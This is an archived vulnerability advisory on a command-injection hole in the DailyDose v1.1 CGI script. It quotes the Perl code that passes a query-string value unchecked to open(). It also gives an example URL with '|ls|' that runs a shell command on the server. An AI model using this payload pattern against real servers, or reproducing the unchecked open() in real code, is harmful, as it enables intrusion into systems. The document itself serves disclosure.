TUCoPS :: Web :: Apps :: bt1673.txt

DailyDose v 1.1 CGI:




Bug is found in this script:

DailyDose v 1.1 (by www.onlinearts.net)

The script (dose.pl) does not check the input:



$data=$ENV{'QUERY_STRING'};

($command,$list,$temp, $id) = split ("&",$data,4);

. . .

local ($template) = "$tempdir/$temp";

open(TEMPL, "$template") || print "no file found $template!";

#open without check var. $temp 



Example (listing):

http://www.someserver.com/cgi-bin/dose.pl?daily&somefile.txt&|ls|



-------------------------- 

Alexey Sintsov aka Don_Huan

huan@xp-team.spb.su



TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH